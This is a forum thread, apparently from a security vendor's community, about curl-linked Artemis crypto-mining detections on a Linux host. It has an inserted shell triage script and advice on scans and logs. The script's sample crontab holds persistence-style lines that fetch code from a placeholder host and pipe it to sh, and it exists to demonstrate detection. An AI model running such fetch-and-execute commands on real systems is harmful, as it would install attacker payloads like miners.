Hello Community members
We have been seeing a lot of events on one of the Linux hosts, and they all have the same details: "successfully handled". This is an Artemis detection. I assume curl is trying to execute some commands; however, I'm not sure how to troubleshoot this scenario and get to the root cause of it. As per the VirusTotal information, this appears to be a crypto-mining related attempt.
Please advise how we can investigate:
- What curl is trying to execute
- Where these jobs are scheduled to run and what are they
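The two questions above (what curl is being asked to run, and where the job is scheduled) can be answered from the host itself. The following POSIX shell helpers are an added triage example written for this thread; they are not from the original post and not part of ENS or Trellix tooling. They assume a standard Linux layout (/etc/crontab, /etc/cron.d, per-user crontabs, systemd timers, /proc) and use a constructed crontab sample to show the matching; the hostname in that sample is a placeholder.

```shell
#!/bin/sh
# Added triage helpers (not from the thread, not ENS/Trellix code).
# Goal: find where curl is scheduled and which process launches it.

# Filter crontab-style text on stdin down to non-comment entries that invoke
# curl, either bare ("curl ...") or by path ("/usr/bin/curl ...").
find_curl_jobs() {
    grep -v '^[[:space:]]*#' | grep -E '(^|[[:space:]/])curl([[:space:]]|$)' || true
}

# Walk /proc and report every process whose command line contains curl,
# together with its parent (pid, ppid, parent command line). The parent is
# usually the scheduler or dropper that keeps re-creating the file.
curl_callers() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null) || continue
        case "$cmd" in
            *curl*) ;;
            *) continue ;;
        esac
        ppid=$(awk '/^PPid:/ {print $2}' "$d/status" 2>/dev/null) || ppid=''
        pcmd=$(tr '\0' ' ' < "/proc/$ppid/cmdline" 2>/dev/null) || pcmd=''
        printf 'pid=%s ppid=%s parent="%s" cmd="%s"\n' "$pid" "$ppid" "$pcmd" "$cmd"
    done
}

# Gather the usual Linux persistence locations and show curl entries plus all
# systemd timers and the cron directories, so the job can be traced to a file.
list_schedulers() {
    {
        cat /etc/crontab /etc/cron.d/* 2>/dev/null || true
        for u in $(cut -d: -f1 /etc/passwd); do
            crontab -l -u "$u" 2>/dev/null || true
        done
    } | find_curl_jobs
    systemctl list-timers --all --no-pager 2>/dev/null || true
    ls -la /etc/cron.hourly /etc/cron.daily /var/spool/cron 2>/dev/null || true
}

# Constructed crontab sample (placeholder host, not from the thread) used to
# demonstrate find_curl_jobs; two of the four lines reference curl.
SAMPLE_CRONTAB='# comment mentioning curl is ignored
*/5 * * * * root curl -fsSL http://PLACEHOLDER.invalid/update.sh | sh
0 3 * * * root /usr/bin/wget -q http://PLACEHOLDER.invalid/a
@reboot svc /usr/bin/curl -o /tmp/.x http://PLACEHOLDER.invalid/b'

# Count the curl entries found in the sample; returns 2 for the sample above.
sample_curl_job_count() {
    printf '%s\n' "$SAMPLE_CRONTAB" | find_curl_jobs | wc -l | tr -d ' '
}
```

Run `list_schedulers` and `curl_callers` as root while the detection is firing; a curl process whose parent is crond, a systemd service, or an unfamiliar binary points directly at the scheduler entry or dropper to remove, which answers the "it keeps coming back" symptom.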
The drive from where you are seeing this detection, is it shared with other users?
Once we have deleted the file from the location and it comes back again, that means there is some other process creating it, if not locally then remotely.
If your Artemis Level for OAS is set as Medium, then trigger an ODS (preferably offline) on that Linux box with same Artemis Level.
Once the ODS is complete, check if you are still seeing the detection from OAS.
Curl is a shared library here, so there is definitely some other application which is using it to trigger these events.
The suggestion of offline scanning was given considering that the machine is shared with others. If that is not the case, then you can directly trigger the ODS.
From the logging side we can only capture what is written within the logs. So if you can share the logs from the opt/isec/ens/threatprevention/var/ location, we can check more details.